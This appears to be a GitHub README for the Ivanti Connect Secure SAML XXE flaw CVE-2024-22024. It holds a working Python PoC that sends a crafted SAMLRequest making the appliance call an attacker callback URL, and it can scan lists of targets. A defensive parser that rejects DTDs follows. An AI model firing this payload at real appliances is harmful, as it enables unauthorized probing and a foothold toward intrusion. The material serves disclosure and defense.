CVE-2024-22024.md

File metadata and controls

102 lines (72 loc) · 3.55 KB

Ivanti Pulse Connect Secure VPN XXE vulnerability (CVE-2024-22024)

The SAML component of Ivanti Pulse Connect Secure VPN parses attacker-supplied XML with external entities enabled (XXE). An unauthenticated attacker can send a crafted SAMLRequest to trigger it; Ivanti's advisory describes the impact as access to certain restricted resources without authentication, and the original write-up states that it can be chained with other functionality towards remote code execution. The PoC below is a blind out-of-band check only: it makes the appliance fetch an attacker-controlled URL and does not read files or execute code.

Affected versions

  • Ivanti Connect Secure 22.4
  • Ivanti Connect Secure 22.5
  • Ivanti Connect Secure 9.1
  • Ivanti Policy Secure 22.5
  • Ivanti Zero Trust Access 22.6

PoC

```python
import base64
import requests
import argparse
from pathlib import Path
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single InsecureRequestWarning from urllib3
urllib3.disable_warnings(InsecureRequestWarning)

'''
    PoC by Abdulla
    CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure
    Remediation:
    https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
'''

def send_request(target_url, attacker_url, timeout):
    # Blind XXE: the DTD declares an external parameter entity that points at the
    # attacker-controlled URL and then references it, so a vulnerable SAML parser
    # fetches <attacker_url>/test. The callback on the attacker side is the signal;
    # the HTTP status code returned by the appliance proves nothing on its own.
    xml_payload_template = """<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "{}"> %xxe;]><r></r>"""
    xml_payload = xml_payload_template.format(attacker_url.rstrip("/") + "/test")
    encoded_payload = base64.b64encode(xml_payload.encode()).decode()  # SAML HTTP-POST binding: plain base64
    data = {'SAMLRequest': encoded_payload}  # Form body for the POST request

    # Attempt the POST request with the specified timeout
    try:
        response = requests.post(target_url.rstrip("/") + "/dana-na/auth/saml-sso.cgi",
                                 data=data, verify=False, timeout=timeout)
        print(f"Response from {target_url}: {response.status_code}")
    except requests.exceptions.Timeout:
        print(f"Request to {target_url} timed out.")
    except requests.exceptions.RequestException as e:
        print(f"Error sending request to {target_url}: {e}")

def main(target_urls, attacker_url, timeout):
    if Path(target_urls).is_file():  # target_urls is a file with one URL per line
        with open(target_urls, 'r') as file:
            urls = [line.strip() for line in file if line.strip()]  # skip blank lines
        for url in urls:
            send_request(url, attacker_url, timeout)
    else:  # Assume target_urls is a single URL
        send_request(target_urls, attacker_url, timeout)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.")
    parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent")
    parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload")
    parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)")
    args = parser.parse_args()

    main(args.target_url, args.attacker_url, args.timeout)
```
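The defender's side of the same request, as an added example that is not part of the original PoC or of Ivanti's code: it decodes a `SAMLRequest` value the way the endpoint would, then inspects the XML prolog with the stdlib `expat` parser before any real parsing happens. SAML messages never legitimately carry a DTD, so any `<!DOCTYPE` or entity declaration is grounds to reject the message outright, which is the generic mitigation for this class of bug. The sample payload is the one the PoC builds; the `attacker.example` host and the minimal `AuthnRequest` are constructed inputs, and the raw-DEFLATE handling covers the HTTP-Redirect binding as well as the HTTP-POST binding the PoC uses.

```python
import base64
import zlib
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from xml.etree import ElementTree as ET
from xml.parsers import expat


@dataclass
class DtdReport:
    """What the prolog of a SAML message declared. A SAML AuthnRequest has no
    reason to contain a DTD at all, so any populated field is a rejection reason."""
    has_doctype: bool = False
    # (entity name, is parameter entity, SYSTEM identifier)
    external_entities: List[Tuple[str, bool, Optional[str]]] = field(default_factory=list)
    internal_entities: List[str] = field(default_factory=list)
    parse_error: Optional[str] = None

    def is_suspicious(self) -> bool:
        return self.has_doctype or bool(self.external_entities) or bool(self.internal_entities)


def encode_post_binding(xml_bytes: bytes) -> str:
    """HTTP-POST binding: the XML is sent as plain base64 (what the PoC does)."""
    return base64.b64encode(xml_bytes).decode()


def encode_redirect_binding(xml_bytes: bytes) -> str:
    """HTTP-Redirect binding: raw DEFLATE (no zlib header) and then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xml_bytes) + comp.flush()).decode()


def decode_saml_request(encoded: str) -> bytes:
    """Undo either binding: try raw inflate first, fall back to plain base64."""
    raw = base64.b64decode(encoded)
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return raw


def inspect_dtd(xml_bytes: bytes) -> DtdReport:
    """Record every DOCTYPE and entity declaration without resolving anything.
    expat reports the declarations before it reaches the %xxe; reference, so the
    report is complete even if parsing stops afterwards."""
    report = DtdReport()
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report.has_doctype = True

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id or public_id:
            report.external_entities.append((name, bool(is_param), system_id))
        else:
            report.internal_entities.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as e:
        report.parse_error = str(e)
    return report


def parse_saml_request_safely(encoded: str) -> str:
    """Reject any message with a DTD, then parse and return the root element tag."""
    xml_bytes = decode_saml_request(encoded)
    report = inspect_dtd(xml_bytes)
    if report.is_suspicious():
        raise ValueError(f"SAMLRequest rejected, DTD present: {report}")
    return ET.fromstring(xml_bytes).tag


def accepts_saml_request(encoded: str) -> bool:
    try:
        parse_saml_request_safely(encoded)
        return True
    except (ValueError, ET.ParseError):
        return False


# Constructed sample inputs (not captured from a real appliance).
XXE_PAYLOAD = (b'<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM '
               b'"http://attacker.example/test"> %xxe;]><r></r>')
BENIGN_AUTHN = (b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
                b'ID="_abc123" Version="2.0" IssueInstant="2024-02-09T00:00:00Z"/>')

if __name__ == "__main__":
    for label, xml in (("xxe", XXE_PAYLOAD), ("benign", BENIGN_AUTHN)):
        enc = encode_post_binding(xml)
        print(label, "accepted" if accepts_saml_request(enc) else "rejected", inspect_dtd(xml))
```

The check deliberately runs before the application parser sees the document, and it rejects internal entities too: an internal-only DTD is still an entity-expansion (billion laughs) vector, and nothing in SAML needs it.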

Parameters

  • -u or --target_url: The target Ivanti Connect Secure (ICS) URL, or a file with one URL per line.
  • -c or --attacker_url: The attacker-controlled callback URL (generate one with Burp Collaborator, ngrok, or a unique URL from Webhook.site). A hit on this URL, not the appliance's HTTP status code, is what confirms the XXE.
  • -t or --timeout: Timeout in seconds for the request (default is 3 seconds).

How to use

Testing a single URL:

```
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
```

Testing list of URLs:

```
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
```

Using a different timeout (5 seconds):

```
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
```

Source